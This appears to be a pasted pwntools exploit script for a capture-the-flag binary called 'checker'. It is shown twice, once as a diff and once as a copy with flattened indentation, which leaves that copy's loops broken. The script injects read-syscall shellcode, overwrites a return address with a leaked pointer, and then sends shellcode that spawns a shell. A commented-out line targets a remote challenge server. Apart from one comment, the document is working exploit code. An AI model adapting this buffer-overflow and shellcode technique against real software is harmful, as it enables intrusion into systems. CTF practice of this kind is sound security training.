d4em0n · April 30, 2018 14:35
diff --git a/exploit_bytechecker.py b/exploit_bytechecker.py
 from pwn import *
 import sys
 # NOTE : Tekan CTRL+D pada saat shell interactive pertama
 ch = process('./checker')
 #ch = remote("35.197.134.203", 8031)
 context.terminal = ['tmux', 'splitw', '-h']
 gdb_cmd = """
 source /home/ramdhan/ctf/tools/peda/peda.py
 b* 0x08048E50
 """
 #gdb.attach(ch, gdb_cmd)

 shc = """
 mov al,3
 int 0x80
 nop
 nop
 nop
 """

 code = asm(shc)
 print(len(code))
 sh = list(code.ljust(144, "\x00"))
 l = len(code)
 st = (l+1)/8
 for i in range(l, 144, 8):
    sh[i] = chr(st)
    st += 1
 ch.recvuntil("= ")
 addr = p32(int(ch.recvline(), 16))
 print(hex(u32(addr)))
 l = 136
 for i in range(4):
    sh[l+i] = addr[i]
 sh = "".join(sh)
 ch.send(sh)
 ch.interactive()
 ch.sendline("AAAA" + asm(shellcraft.sh()))
 ch.interactive()
	from pwn import *
	import sys
	# NOTE : Tekan CTRL+D pada saat shell interactive pertama
	ch = process('./checker')
	#ch = remote("35.197.134.203", 8031)
	context.terminal = ['tmux', 'splitw', '-h']
	gdb_cmd = """
	source /home/ramdhan/ctf/tools/peda/peda.py
	b* 0x08048E50
	"""
	#gdb.attach(ch, gdb_cmd)

	shc = """
	mov al,3
	int 0x80
	nop
	nop
	nop
	"""

	code = asm(shc)
	print(len(code))
	sh = list(code.ljust(144, "\x00"))
	l = len(code)
	st = (l+1)/8
	for i in range(l, 144, 8):
	sh[i] = chr(st)
	st += 1
	ch.recvuntil("= ")
	addr = p32(int(ch.recvline(), 16))
	print(hex(u32(addr)))
	l = 136
	for i in range(4):
	sh[l+i] = addr[i]
	sh = "".join(sh)
	ch.send(sh)
	ch.interactive()
	ch.sendline("AAAA" + asm(shellcraft.sh()))
	ch.interactive()